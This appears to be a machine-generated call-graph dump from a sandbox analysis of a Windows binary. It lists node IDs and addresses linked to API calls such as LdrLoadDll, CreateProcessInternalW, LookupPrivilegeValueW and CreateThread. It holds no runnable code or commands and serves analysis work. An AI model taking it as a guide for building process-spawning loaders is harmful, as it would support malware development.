LdrLoadDll 83709->83710 83711 419031 83710->83711 83712 418eb0 LdrLoadDll 83711->83712 83713 41903d 83712->83713 83714 418eb0 LdrLoadDll 83713->83714 83715 419046 83714->83715 83716 418eb0 LdrLoadDll 83715->83716 83717 41904f 83716->83717 83718 418eb0 LdrLoadDll 83717->83718 83719 419058 83718->83719 83720 418eb0 LdrLoadDll 83719->83720 83721 419061 83720->83721 83722 418eb0 LdrLoadDll 83721->83722 83723 41906a 83722->83723 83724 418eb0 LdrLoadDll 83723->83724 83725 419076 83724->83725 83726 418eb0 LdrLoadDll 83725->83726 83727 41907f 83726->83727 83728 418eb0 LdrLoadDll 83727->83728 83729 419088 83728->83729 83730 418eb0 LdrLoadDll 83729->83730 83731 419091 83730->83731 83732 418eb0 LdrLoadDll 83731->83732 83733 41909a 83732->83733 83734 418eb0 LdrLoadDll 83733->83734 83735 4190a3 83734->83735 83736 418eb0 LdrLoadDll 83735->83736 83737 4190af 83736->83737 83738 418eb0 LdrLoadDll 83737->83738 83739 4190b8 83738->83739 83740 418eb0 LdrLoadDll 83739->83740 83741 4190c1 83740->83741 83742 418eb0 LdrLoadDll 83741->83742 83743 4190ca 83742->83743 83744 418eb0 LdrLoadDll 83743->83744 83745 4190d3 83744->83745 83746 418eb0 LdrLoadDll 83745->83746 83747 4190dc 83746->83747 83748 418eb0 LdrLoadDll 83747->83748 83749 4190e8 83748->83749 83750 418eb0 LdrLoadDll 83749->83750 83751 4190f1 83750->83751 83752 418eb0 LdrLoadDll 83751->83752 83753 4190fa 83752->83753 83754 418eb0 LdrLoadDll 83753->83754 83755 419103 83754->83755 83756 418eb0 LdrLoadDll 83755->83756 83757 41910c 83756->83757 83758 418eb0 LdrLoadDll 83757->83758 83759 419115 83758->83759 83760 418eb0 LdrLoadDll 83759->83760 83761 419121 83760->83761 83762 418eb0 LdrLoadDll 83761->83762 83763 41912a 83762->83763 83764 418eb0 LdrLoadDll 83763->83764 83765 419133 83764->83765 83766 418eb0 LdrLoadDll 83765->83766 83767 41913c 83766->83767 83768 418eb0 LdrLoadDll 83767->83768 83769 419145 83768->83769 83770 418eb0 LdrLoadDll 83769->83770 83771 41914e 83770->83771 83772 418eb0 LdrLoadDll 83771->83772 83773 41915a 83772->83773 83774 418eb0 LdrLoadDll 83773->83774 83775 419163 83774->83775 83776 418eb0 LdrLoadDll 83775->83776 83777 41916c 83776->83777 83777->83557 83779 4191e0 LdrLoadDll 83778->83779 83780 41815c 83779->83780 83805 43a2d10 LdrInitializeThunk 83780->83805 83781 418173 83781->83487 83783->83554 83785 41b260 83784->83785 83786 41b266 83784->83786 83785->83661 83787 41a270 2 API calls 83786->83787 83788 41b28c 83787->83788 83788->83661 83790 41b2f0 83789->83790 83791 41b34d 83790->83791 83792 41a270 2 API calls 83790->83792 83791->83668 83793 41b32a 83792->83793 83794 41a0a0 2 API calls 83793->83794 83794->83791 83796 413324 83795->83796 83797 41a0a0 2 API calls 83795->83797 83796->83680 83797->83796 83798->83665 83800 418ecb 83799->83800 83801 413e50 LdrLoadDll 83800->83801 83802 418eeb 83801->83802 83803 413e50 LdrLoadDll 83802->83803 83804 418f97 83802->83804 83803->83804 83804->83702 83805->83781 83807 43a2b3f LdrInitializeThunk 83806->83807 83808 43a2b31 83806->83808 83807->83563 83808->83563 83810 41890c RtlFreeHeap 83809->83810 83811 4191e0 LdrLoadDll 83809->83811 83810->83567 83811->83810 83813 406e30 83812->83813 83814 406e2b 83812->83814 83815 41a020 2 API calls 83813->83815 83814->83495 83824 406e55 83815->83824 83816 406eb8 83816->83495 83817 418140 2 API calls 83817->83824 83818 406ebe 83819 406ee4 83818->83819 83821 418840 2 API calls 83818->83821 83819->83495 83822 406ed5 83821->83822 83822->83495 83823 41a020 2 API calls 83823->83824 83824->83816 83824->83817 83824->83818 83824->83823 83828 418840 83824->83828 83826 4070fe 83825->83826 83827 418840 2 API calls 83825->83827 83826->83456 83827->83826 83829 4191e0 LdrLoadDll 83828->83829 83830 41885c 83829->83830 83833 43a2b90 LdrInitializeThunk 83830->83833 83831 418873 83831->83824 83833->83831 83835 419843 83834->83835 83836 409b40 LdrLoadDll 83835->83836 83837 408a6a 83836->83837 83837->83462 83839 409eb3 83838->83839 83841 409f30 83839->83841 83853 417f10 LdrLoadDll 83839->83853 83841->83469 83843 4191e0 LdrLoadDll 83842->83843 83844 40cfab 83843->83844 83844->83472 83845 418a50 83844->83845 83846 4191e0 LdrLoadDll 83845->83846 83847 418a6f LookupPrivilegeValueW 83846->83847 83847->83474 83849 4191e0 LdrLoadDll 83848->83849 83850 4184fc 83849->83850 83854 43a2dc0 LdrInitializeThunk 83850->83854 83851 41851b 83851->83475 83853->83841 83854->83851 83856 40a037 83855->83856 83857 409e90 LdrLoadDll 83856->83857 83858 40a066 83857->83858 83858->83415 83860 409d84 83859->83860 83913 417f10 LdrLoadDll 83860->83913 83862 409dbe 83862->83417 83864 40d19c 83863->83864 83865 40a010 LdrLoadDll 83864->83865 83866 40d1ae 83865->83866 83914 40d080 83866->83914 83869 40d1e1 83872 40d1f2 83869->83872 83874 418710 2 API calls 83869->83874 83870 40d1c9 83871 40d1d4 83870->83871 83873 418710 2 API calls 83870->83873 83871->83421 83872->83421 83873->83871 83874->83872 83876 40aee6 83875->83876 83877 40aef0 83875->83877 83876->83429 83878 409e90 LdrLoadDll 83877->83878 83879 40af61 83878->83879 83880 409d60 LdrLoadDll 83879->83880 83881 40af75 83880->83881 83882 40af98 83881->83882 83883 409e90 LdrLoadDll 83881->83883 83882->83429 83884 40afb4 83883->83884 83885 413a50 8 API calls 83884->83885 83886 40b009 83885->83886 83886->83429 83888 40ba66 83887->83888 83889 409e90 LdrLoadDll 83888->83889 83890 40ba7a 83889->83890 83933 40b730 83890->83933 83892 407f8c 83911 40b020 LdrLoadDll 83892->83911 83896 407c83 83893->83896 83963 40d430 83893->83963 83895 407e31 83895->83441 83896->83895 83968 4133a0 83896->83968 83898 407ce2 83898->83895 83971 407a20 83898->83971 83901 41b250 2 API calls 83902 407d29 83901->83902 83903 41b380 3 API calls 83902->83903 83907 407d3e 83903->83907 83904 406e20 4 API calls 83904->83907 83907->83895 83907->83904 83909 4070e0 2 API calls 83907->83909 83976 40ac00 83907->83976 84026 40d3d0 83907->84026 84030 40ceb0 83907->84030 83909->83907 83910->83418 83911->83434 83912->83439 83913->83862 83915 40d09a 83914->83915 83923 40d150 83914->83923 83916 409e90 LdrLoadDll 83915->83916 83917 40d0bc 83916->83917 83924 4181c0 83917->83924 83919 40d0fe 83927 418200 83919->83927 83922 418710 2 API calls 83922->83923 83923->83869 83923->83870 83925 4191e0 LdrLoadDll 83924->83925 83926 4181dc 83925->83926 83926->83919 83928 41821c 83927->83928 83929 4191e0 LdrLoadDll 83927->83929 83932 43a34e0 LdrInitializeThunk 83928->83932 83929->83928 83930 40d144 83930->83922 83932->83930 83934 40b747 83933->83934 83942 40d470 83934->83942 83938 40b7bb 83939 40b7c2 83938->83939 83954 418520 LdrLoadDll 83938->83954 83939->83892 83941 40b7d5 83941->83892 83943 40d495 83942->83943 83955 407120 83943->83955 83945 40b78f 83950 418960 83945->83950 83946 413a50 8 API calls 83948 40d4b9 83946->83948 83948->83945 83948->83946 83949 41a0a0 2 API calls 83948->83949 83962 40d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 83948->83962 83949->83948 83951 4191e0 LdrLoadDll 83950->83951 83952 41897f CreateProcessInternalW 83951->83952 83952->83938 83954->83941 83956 40721f 83955->83956 83957 407135 83955->83957 83956->83948 83957->83956 83958 413a50 8 API calls 83957->83958 83960 4071a2 83958->83960 83959 4071c9 83959->83948 83960->83959 83961 41a0a0 2 API calls 83960->83961 83961->83959 83962->83948 83964 40d44f 83963->83964 83965 413e50 LdrLoadDll 83963->83965 83966 40d456 SetErrorMode 83964->83966 83967 40d45d 83964->83967 83965->83964 83966->83967 83967->83896 83970 4133c6 83968->83970 84046 40d200 83968->84046 83970->83898 83972 41a020 2 API calls 83971->83972 83975 407a45 83971->83975 83972->83975 83973 407c5a 83973->83901 83975->83973 84065 417b00 83975->84065 83977 40ac1f 83976->83977 83978 40ac19 83976->83978 84122 408620 83977->84122 84113 40ccc0 83978->84113 83981 40ac2c 83982 41b380 3 API calls 83981->83982 84025 40aeb8 83981->84025 83983 40ac48 83982->83983 83984 40ac5c 83983->83984 83985 40d3d0 2 API calls 83983->83985 84131 417f90 83984->84131 83985->83984 83988 40ad86 84147 40aba0 LdrLoadDll LdrInitializeThunk 83988->84147 83989 418180 2 API calls 83990 40acda 83989->83990 83990->83988 83996 40ace6 83990->83996 83992 40ada5 83993 40adad 83992->83993 84148 40ab10 LdrLoadDll NtClose LdrInitializeThunk 83992->84148 83997 418710 2 API calls 83993->83997 83995 40ad2f 84000 418710 2 API calls 83995->84000 83996->83995 83999 418290 2 API calls 83996->83999 83996->84025 84001 40adb7 83997->84001 83998 40adcf 83998->83993 84002 40add6 83998->84002 83999->83995 84003 40ad4c 84000->84003 84001->83907 84008 40adee 84002->84008 84149 40aa90 84002->84149 84134 4175b0 84003->84134 84007 40ad63 84007->84025 84137 407280 84007->84137 84153 418010 LdrLoadDll 84008->84153 84009 40ae02 84154 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 84009->84154 84012 40ae26 84014 40ae73 84012->84014 84155 418040 LdrLoadDll 84012->84155 84157 4180a0 LdrLoadDll 84014->84157 84017 40ae81 84019 418710 2 API calls 84017->84019 84018 40ae44 84018->84014 84156 4180d0 LdrLoadDll 84018->84156 84020 40ae8b 84019->84020 84022 418710 2 API calls 84020->84022 84023 40ae95 84022->84023 84024 407280 3 API calls 84023->84024 84023->84025 84024->84025 84025->83907 84027 40d3e3 84026->84027 84228 418110 84027->84228 84031 40cec0 84030->84031 84032 40cef8 84030->84032 84031->84032 84041 40ceef 84031->84041 84234 40bd30 84031->84234 84038 40cf13 84032->84038 84045 40cf48 84032->84045 84289 40cc60 11 API calls 84032->84289 84267 40cbe0 84038->84267 84040 40cf57 84040->83907 84249 40cd10 84041->84249 84044 413a50 8 API calls 84044->84045 84290 404360 27 API calls 84045->84290 84047 40d21d 84046->84047 84053 418240 84047->84053 84050 40d265 84050->83970 84054 4191e0 LdrLoadDll 84053->84054 84055 41825c 84054->84055 84063 43a2e50 LdrInitializeThunk 84055->84063 84056 40d25e 84056->84050 84058 418290 84056->84058 84059 4182ac 84058->84059 84060 4191e0 LdrLoadDll 84058->84060 84064 43a2c30 LdrInitializeThunk 84059->84064 84060->84059 84061 40d28e 84061->83970 84063->84056 84064->84061 84066 41a270 2 API calls 84065->84066 84067 417b17 84066->84067 84086 408160 84067->84086 84069 417b32 84070 417b70 84069->84070 84071 417b59 84069->84071 84073 41a020 2 API calls 84070->84073 84072 41a0a0 2 API calls 84071->84072 84074 417b66 84072->84074 84075 417baa 84073->84075 84074->83973 84076 41a020 2 API calls 84075->84076 84078 417bc3 84076->84078 84077 417e64 84084 41a0a0 2 API calls 84077->84084 84078->84077 84092 41a060 LdrLoadDll 84078->84092 84080 417e49 84080->84077 84081 417e50 84080->84081 84082 41a0a0 2 API calls 84081->84082 84083 417e5a 84082->84083 84083->83973 84085 417eb9 84084->84085 84085->83973 84087 408185 84086->84087 84088 409b40 LdrLoadDll 84087->84088 84089 4081b8 84088->84089 84090 4081dd 84089->84090 84093 40b340 84089->84093 84090->84069 84092->84080 84094 40b36c 84093->84094 84095 418460 LdrLoadDll 84094->84095 84096 40b385 84095->84096 84097 40b38c 84096->84097 84104 4184a0 84096->84104 84097->84090 84101 40b3c7 84102 418710 2 API calls 84101->84102 84103 40b3ea 84102->84103 84103->84090 84105 4184bc 84104->84105 84106 4191e0 LdrLoadDll 84104->84106 84112 43a2bc0 LdrInitializeThunk 84105->84112 84106->84105 84107 40b3af 84107->84097 84109 418a90 84107->84109 84110 4191e0 LdrLoadDll 84109->84110 84111 418aaf 84110->84111 84111->84101 84112->84107 84158 40bdb0 84113->84158 84115 40ccd7 84121 40ccf0 84115->84121 84171 403d70 84115->84171 84117 41a270 2 API calls 84118 40ccfe 84117->84118 84118->83977 84119 40ccea 84195 417430 84119->84195 84121->84117 84123 40863b 84122->84123 84124 40d080 3 API calls 84123->84124 84130 40875b 84123->84130 84125 40873c 84124->84125 84126 40876a 84125->84126 84127 408751 84125->84127 84128 418710 2 API calls 84125->84128 84126->83981 84227 405ea0 LdrLoadDll 84127->84227 84128->84127 84130->83981 84132 40acb0 84131->84132 84133 4191e0 LdrLoadDll 84131->84133 84132->83988 84132->83989 84132->84025 84133->84132 84135 4175e2 84134->84135 84136 40d3d0 2 API calls 84134->84136 84135->84007 84136->84135 84138 407298 84137->84138 84139 409b40 LdrLoadDll 84138->84139 84140 4072b3 84139->84140 84141 413e50 LdrLoadDll 84140->84141 84142 4072c3 84141->84142 84143 4072cc PostThreadMessageW 84142->84143 84144 4072fd 84142->84144 84143->84144 84145 4072e0 84143->84145 84144->83907 84146 4072ea PostThreadMessageW 84145->84146 84146->84144 84147->83992 84148->83998 84150 40aac4 84149->84150 84151 418290 2 API calls 84150->84151 84152 40aacb 84151->84152 84152->84008 84153->84009 84154->84012 84155->84018 84156->84014 84157->84017 84159 40bde3 84158->84159 84200 40a150 84159->84200 84161 40bdf5 84204 40a2c0 84161->84204 84163 40be13 84164 40a2c0 LdrLoadDll 84163->84164 84165 40be29 84164->84165 84166 40d200 3 API calls 84165->84166 84167 40be4d 84166->84167 84168 40be54 84167->84168 84169 41a2b0 2 API calls 84167->84169 84168->84115 84170 40be64 84169->84170 84170->84115 84172 403d7d 84171->84172 84173 40b340 3 API calls 84172->84173 84175 403e61 84173->84175 84174 403e68 84174->84119 84175->84174 84207 41a2f0 84175->84207 84177 403ec9 84178 409e90 LdrLoadDll 84177->84178 84179 403fd3 84178->84179 84180 409e90 LdrLoadDll 84179->84180 84181 403ff7 84180->84181 84211 40b400 84181->84211 84185 404083 84186 41a020 2 API calls 84185->84186 84187 404110 84186->84187 84188 41a020 2 API calls 84187->84188 84190 40412a 84188->84190 84189 4042a6 84189->84119 84190->84189 84191 409e90 LdrLoadDll 84190->84191 84192 40416a 84191->84192 84193 409d60 LdrLoadDll 84192->84193 84194 40420a 84193->84194 84194->84119 84196 413e50 LdrLoadDll 84195->84196 84197 417451 84196->84197 84198 417477 84197->84198 84199 417464 CreateThread 84197->84199 84198->84121 84199->84121 84201 40a177 84200->84201 84202 409e90 LdrLoadDll 84201->84202 84203 40a1b3 84202->84203 84203->84161 84205 409e90 LdrLoadDll 84204->84205 84206 40a2d9 84205->84206 84206->84163 84208 41a2fd 84207->84208 84209 413e50 LdrLoadDll 84208->84209 84210 41a310 84209->84210 84210->84177 84212 40b425 84211->84212 84220 418310 84212->84220 84215 4183a0 84216 4191e0 LdrLoadDll 84215->84216 84217 4183bc 84216->84217 84226 43a2b00 LdrInitializeThunk 84217->84226 84218 4183db 84218->84185 84221 4191e0 LdrLoadDll 84220->84221 84222 41832c 84221->84222 84223 40405c 84222->84223 84225 43a2b80 LdrInitializeThunk 84222->84225 84223->84185 84223->84215 84225->84223 84226->84218 84227->84130 84229 4191e0 LdrLoadDll 84228->84229 84230 41812c 84229->84230 84233 43a2cf0 LdrInitializeThunk 84230->84233 84231 40d40e 84231->83907 84233->84231 84235 40bd40 84234->84235 84236 40bda5 84234->84236 84235->84236 84291 40d010 84235->84291 84236->84041 84238 40bd50 84239 413a50 8 API calls 84238->84239 84240 40bd61 84239->84240 84241 413a50 8 API calls 84240->84241 84242 40bd6c 84241->84242 84243 40bd7a 84242->84243 84299 40b7f0 84242->84299 84245 413a50 8 API calls 84243->84245 84246 40bd88 84245->84246 84247 413a50 8 API calls 84246->84247 84248 40bd93 84247->84248 84248->84041 84250 40cd40 84249->84250 84350 412d60 84250->84350 84252 40cd81 84388 411a50 84252->84388 84254 40cd87 84424 40ed00 84254->84424 84256 40cd8d 84447 410bd0 84256->84447 84258 40cd95 84479 411d70 84258->84479 84262 40cda1 84513 4123e0 84262->84513 84264 40cda7 84539 40d720 84264->84539 84268 40cbf8 84267->84268 84272 40cc49 84267->84272 84269 40db00 8 API calls 84268->84269 84268->84272 84270 40cc33 84269->84270 84270->84272 84726 40dd50 84270->84726 84272->84040 84273 40ca20 84272->84273 84274 40cb1b 84273->84274 84275 40ca3c 84273->84275 84286 40cbb1 84274->84286 84783 40b570 84274->84783 84275->84274 84276 418710 2 API calls 84275->84276 84277 40ca57 84276->84277 84282 40b570 4 API calls 84277->84282 84278 413a50 8 API calls 84279 40cbce 84278->84279 84279->84044 84279->84045 84281 40cb8b 84284 40b7f0 5 API calls 84281->84284 84281->84286 84283 40ca8f 84282->84283 84285 409e90 LdrLoadDll 84283->84285 84284->84286 84287 40caa0 84285->84287 84286->84278 84286->84279 84288 409e90 LdrLoadDll 84287->84288 84288->84274 84289->84038 84290->84040 84292 40d037 84291->84292 84293 418460 LdrLoadDll 84291->84293 84294 40d03e 84292->84294 84295 4184a0 2 API calls 84292->84295 84293->84292 84294->84238 84296 40d05c 84295->84296 84297 418710 2 API calls 84296->84297 84298 40d068 84297->84298 84298->84238 84300 40b815 84299->84300 84301 40b823 84300->84301 84302 40b837 84300->84302 84304 409e90 LdrLoadDll 84301->84304 84303 409e90 LdrLoadDll 84302->84303 84305 40b846 84303->84305 84306 40b832 84304->84306 84308 40b340 3 API calls 84305->84308 84307 409e90 LdrLoadDll 84306->84307 84309 40ba34 84306->84309 84310 40b8a6 84307->84310 84308->84306 84309->84243 84311 409e90 LdrLoadDll 84310->84311 84312 40b8d7 84311->84312 84313 40b9d0 84312->84313 84315 40b400 2 API calls 84312->84315 84314 40b400 2 API calls 84313->84314 84316 40b9e9 84314->84316 84317 40b8fa 84315->84317 84340 40b4b0 84316->84340 84319 40b905 84317->84319 84320 40b9af 84317->84320 84321 418710 2 API calls 84319->84321 84324 409e90 LdrLoadDll 84320->84324 84322 40b90f 84321->84322 84326 409e90 LdrLoadDll 84322->84326 84323 418710 2 API calls 84323->84309 84324->84313 84325 40b9f9 84325->84323 84327 40b933 84326->84327 84328 40b400 2 API calls 84327->84328 84329 40b949 84328->84329 84330 418710 2 API calls 84329->84330 84331 40b953 84330->84331 84332 409e90 LdrLoadDll 84331->84332 84333 40b977 84332->84333 84334 40b400 2 API calls 84333->84334 84335 40b98d 84334->84335 84336 40b4b0 2 API calls 84335->84336 84337 40b99d 84336->84337 84338 418710 2 API calls 84337->84338 84339 40b9a7 84338->84339 84339->84243 84341 40b4d4 84340->84341 84344 418360 84341->84344 84345 4191e0 LdrLoadDll 84344->84345 84346 41837c 84345->84346 84349 43a2fb0 LdrInitializeThunk 84346->84349 84347 40b55b 84347->84325 84349->84347 84351 412d88 84350->84351 84352 409e90 LdrLoadDll 84351->84352 84353 412db7 84352->84353 84354 40b340 3 API calls 84353->84354 84356 412dea 84354->84356 84355 412df1 84355->84252 84356->84355 84357 409e90 LdrLoadDll 84356->84357 84358 412e19 84357->84358 84359 409e90 LdrLoadDll 84358->84359 84360 412e3d 84359->84360 84361 40b400 2 API calls 84360->84361 84362 412e61 84361->84362 84369 412ea3 84362->84369 84551 4126c0 84362->84551 84364 412e7a 84365 413026 84364->84365 84555 412ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84364->84555 84365->84252 84366 409e90 LdrLoadDll 84368 412ec3 84366->84368 84370 40b400 2 API calls 84368->84370 84369->84366 84371 412ee7 84370->84371 84372 412f2d 84371->84372 84373 412f04 84371->84373 84375 4126c0 8 API calls 84371->84375 84374 40b400 2 API calls 84372->84374 84373->84365 84556 412ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84373->84556 84377 412f5d 84374->84377 84375->84373 84378 412fa3 84377->84378 84379 412f7a 84377->84379 84381 4126c0 8 API calls 84377->84381 84382 40b400 2 API calls 84378->84382 84379->84365 84557 412ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84379->84557 84381->84379 84383 413002 84382->84383 84384 41304b 84383->84384 84385 41301f 84383->84385 84386 4126c0 8 API calls 84383->84386 84384->84252 84385->84365 84558 412ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 84385->84558 84386->84385 84389 411ab4 84388->84389 84390 409e90 LdrLoadDll 84389->84390 84391 411b81 84390->84391 84392 40b340 3 API calls 84391->84392 84393 411bb4 84392->84393 84394 411bbb 84393->84394 84395 409e90 LdrLoadDll 84393->84395 84394->84254 84396 411be3 84395->84396 84397 40b400 2 API calls 84396->84397 84398 411c23 84397->84398 84399 411d43 84398->84399 84400 4126c0 8 API calls 84398->84400 84399->84254 84401 411c40 84400->84401 84402 411d52 84401->84402 84559 411870 84401->84559 84403 418710 2 API calls 84402->84403 84405 411d5c 84403->84405 84405->84254 84406 411c58 84406->84402 84407 411c63 84406->84407 84408 41a270 2 API calls 84407->84408 84409 411c8c 84408->84409 84410 411c95 84409->84410 84411 411cab 84409->84411 84413 418710 2 API calls 84410->84413 84588 411760 CoInitialize 84411->84588 84415 411c9f 84413->84415 84414 411cb9 84590 418420 84414->84590 84415->84254 84417 411d32 84418 418710 2 API calls 84417->84418 84420 411d3c 84418->84420 84422 41a0a0 2 API calls 84420->84422 84421 411cd7 84421->84417 84423 418420 2 API calls 84421->84423 84596 411690 LdrLoadDll RtlFreeHeap 84421->84596 84422->84399 84423->84421 84425 40ed28 84424->84425 84426 41a270 2 API calls 84425->84426 84428 40ed88 84426->84428 84427 40ed91 84427->84256 84428->84427 84598 40e9c0 84428->84598 84430 40edb8 84431 40edd6 84430->84431 84633 4107c0 11 API calls 84430->84633 84436 40edf0 84431->84436 84635 409c90 LdrLoadDll 84431->84635 84433 40edca 84634 4107c0 11 API calls 84433->84634 84437 40e9c0 10 API calls 84436->84437 84438 40ee1b 84437->84438 84439 40ee3a 84438->84439 84636 4107c0 11 API calls 84438->84636 84441 40ee54 84439->84441 84638 409c90 LdrLoadDll 84439->84638 84442 41a0a0 2 API calls 84441->84442 84445 40ee5e 84442->84445 84443 40ee2e 84637 4107c0 11 API calls 84443->84637 84445->84256 84448 410bf6 84447->84448 84449 410c08 84448->84449 84450 410c8e 84448->84450 84452 409e90 LdrLoadDll 84449->84452 84451 410c6c 84450->84451 84654 411d90 84450->84654 84458 410c86 84451->84458 84659 416b60 84451->84659 84455 410c19 84452->84455 84456 410c37 84455->84456 84457 409e90 LdrLoadDll 84455->84457 84461 409e90 LdrLoadDll 84456->84461 84457->84456 84458->84258 84459 410d20 84459->84258 84460 410ccb 84460->84459 84462 410cea 84460->84462 84463 410d2c 84460->84463 84464 410c5b 84461->84464 84465 410cf2 84462->84465 84466 410d0f 84462->84466 84468 409e90 LdrLoadDll 84463->84468 84467 413a50 8 API calls 84464->84467 84469 41a0a0 2 API calls 84465->84469 84470 41a0a0 2 API calls 84466->84470 84467->84451 84471 410d3d 84468->84471 84472 410d03 84469->84472 84470->84459 84685 410000 84471->84685 84472->84258 84474 410d57 84475 410e3f 84474->84475 84691 4106f0 9 API calls 84474->84691 84476 41a0a0 2 API calls 84475->84476 84477 410e46 84476->84477 84477->84258 84480 40cd9b 84479->84480 84481 410bd0 11 API calls 84479->84481 84482 40fbc0 84480->84482 84481->84480 84483 40fbe2 84482->84483 84484 409e90 LdrLoadDll 84483->84484 84485 40fdad 84484->84485 84486 409e90 LdrLoadDll 84485->84486 84487 40fdbe 84486->84487 84488 409d60 LdrLoadDll 84487->84488 84489 40fdd5 84488->84489 84693 40fa90 84489->84693 84492 40fa90 11 API calls 84493 40fe4b 84492->84493 84494 40fa90 11 API calls 84493->84494 84495 40fe63 84494->84495 84496 40fa90 11 API calls 84495->84496 84497 40fe7b 84496->84497 84498 40fa90 11 API calls 84497->84498 84499 40fe93 84498->84499 84500 40fa90 11 API calls 84499->84500 84502 40feae 84500->84502 84501 40fec8 84501->84262 84502->84501 84503 40fa90 11 API calls 84502->84503 84504 40fefc 84503->84504 84505 40fa90 11 API calls 84504->84505 84506 40ff39 84505->84506 84507 40fa90 11 API calls 84506->84507 84508 40ff76 84507->84508 84509 40fa90 11 API calls 84508->84509 84510 40ffb3 84509->84510 84511 40fa90 11 API calls 84510->84511 84512 40fff0 84511->84512 84512->84262 84514 4123fd 84513->84514 84515 409b40 LdrLoadDll 84514->84515 84516 412418 84515->84516 84517 413e50 LdrLoadDll 84516->84517 84536 4125e6 84516->84536 84518 412442 84517->84518 84519 413e50 LdrLoadDll 84518->84519 84520 412455 84519->84520 84521 413e50 LdrLoadDll 84520->84521 84522 412468 84521->84522 84523 413e50 LdrLoadDll 84522->84523 84524 41247b 84523->84524 84525 413e50 LdrLoadDll 84524->84525 84526 412491 84525->84526 84527 413e50 LdrLoadDll 84526->84527 84528 4124a4 84527->84528 84529 413e50 LdrLoadDll 84528->84529 84530 4124b7 84529->84530 84531 413e50 LdrLoadDll 84530->84531 84532 4124ca 84531->84532 84533 413e50 LdrLoadDll 84532->84533 84534 4124df 84533->84534 84535 4126c0 8 API calls 84534->84535 84534->84536 84538 412561 84535->84538 84536->84264 84538->84536 84708 411fa0 LdrLoadDll 84538->84708 84540 40d783 84539->84540 84709 410130 84540->84709 84542 40d7e4 84544 411d90 8 API calls 84542->84544 84543 40d7a6 84543->84542 84718 40d5d0 84543->84718 84546 40d807 84544->84546 84547 40d5d0 8 API calls 84546->84547 84548 40d845 84546->84548 84547->84548 84549 40d5d0 8 API calls 84548->84549 84550 40cdcb 84549->84550 84550->84032 84552 41273d 84551->84552 84553 413a50 8 API calls 84552->84553 84554 4128b9 84552->84554 84553->84554 84554->84364 84555->84369 84556->84372 84557->84378 84558->84384 84560 41188c 84559->84560 84561 409b40 LdrLoadDll 84560->84561 84562 4118a7 84561->84562 84563 4118b0 84562->84563 84564 413e50 LdrLoadDll 84562->84564 84563->84406 84565 4118c7 84564->84565 84566 413e50 LdrLoadDll 84565->84566 84567 4118dc 84566->84567 84568 413e50 LdrLoadDll 84567->84568 84569 4118ef 84568->84569 84570 413e50 LdrLoadDll 84569->84570 84571 411902 84570->84571 84572 413e50 LdrLoadDll 84571->84572 84573 411918 84572->84573 84574 413e50 LdrLoadDll 84573->84574 84575 41192b 84574->84575 84576 409b40 LdrLoadDll 84575->84576 84578 411954 84576->84578 84577 4119f0 84577->84406 84578->84577 84579 413e50 LdrLoadDll 84578->84579 84580 411978 84579->84580 84581 409b40 LdrLoadDll 84580->84581 84582 4119ad 84581->84582 84582->84577 84583 413e50 LdrLoadDll 84582->84583 84584 4119ca 84583->84584 84585 413e50 LdrLoadDll 84584->84585 84586 4119dd 84585->84586 84587 413e50 LdrLoadDll 84586->84587 84587->84577 84589 4117c5 84588->84589 84589->84414 84591 41842e 84590->84591 84592 4191e0 LdrLoadDll 84591->84592 84593 41843c 84592->84593 84597 43a2ac0 LdrInitializeThunk 84593->84597 84594 41845b 84594->84421 84596->84421 84597->84594 84599 40ea58 84598->84599 84600 409e90 LdrLoadDll 84599->84600 84601 40eaf6 84600->84601 84602 409e90 LdrLoadDll 84601->84602 84603 40eb11 84602->84603 84604 40b400 2 API calls 84603->84604 84605 40eb36 84604->84605 84606 40ecae 84605->84606 84608 4183a0 2 API calls 84605->84608 84607 40ecbf 84606->84607 84639 40db00 84606->84639 84607->84430 84610 40eb61 84608->84610 84611 40eca4 84610->84611 84613 40eb6c 84610->84613 84612 418710 2 API calls 84611->84612 84612->84606 84614 418710 2 API calls 84613->84614 84615 40ebaf 84614->84615 84651 41a340 LdrLoadDll 84615->84651 84617 40ebe8 84618 40ebef 84617->84618 84619 40b400 2 API calls 84617->84619 84618->84430 84620 40ec13 84619->84620 84620->84607 84621 4183a0 2 API calls 84620->84621 84622 40ec38 84621->84622 84623 40ec8b 84622->84623 84624 40ec3f 84622->84624 84625 418710 2 API calls 84623->84625 84626 418710 2 API calls 84624->84626 84627 40ec95 84625->84627 84628 40ec49 84626->84628 84627->84430 84652 40e130 LdrLoadDll 84628->84652 84630 40ec66 84630->84607 84653 40e740 8 API calls 84630->84653 84632 40ec7c 84632->84430 84633->84433 84634->84431 84635->84436 84636->84443 84637->84439 84638->84441 84640 40db25 84639->84640 84641 409e90 LdrLoadDll 84640->84641 84642 40dbe0 84641->84642 84643 409e90 LdrLoadDll 84642->84643 84644 40dc04 84643->84644 84645 413a50 8 API calls 84644->84645 84646 40dc57 84645->84646 84647 40dd11 84646->84647 84648 409e90 LdrLoadDll 84646->84648 84647->84607 84649 40dcbe 84648->84649 84650 413a50 8 API calls 84649->84650 84650->84647 84651->84617 84652->84630 84653->84632 84655 409e90 LdrLoadDll 84654->84655 84656 411dac 84655->84656 84657 411e65 84656->84657 84658 413a50 8 API calls 84656->84658 84657->84451 84658->84657 84660 416b6e 84659->84660 84661 416b75 84659->84661 84660->84460 84662 409b40 LdrLoadDll 84661->84662 84663 416ba0 84662->84663 84664 416cf4 84663->84664 84665 41a270 2 API calls 84663->84665 84664->84460 84666 416bb8 84665->84666 84666->84664 84692 4101a0 LdrLoadDll 84666->84692 84668 416bd6 84669 413e50 LdrLoadDll 84668->84669 84670 416bec 84669->84670 84671 413e50 LdrLoadDll 84670->84671 84672 416c08 84671->84672 84673 413e50 LdrLoadDll 84672->84673 84674 416c24 84673->84674 84675 413e50 LdrLoadDll 84674->84675 84676 416c43 84675->84676 84677 413e50 LdrLoadDll 84676->84677 84678 416c5f 84677->84678 84679 413e50 LdrLoadDll 84678->84679 84680 416c7b 84679->84680 84681 413e50 LdrLoadDll 84680->84681 84682 416ca1 84681->84682 84683 41a0a0 2 API calls 84682->84683 84684 416ce4 84682->84684 84683->84664 84684->84460 84686 410026 84685->84686 84687 409e90 LdrLoadDll 84686->84687 84688 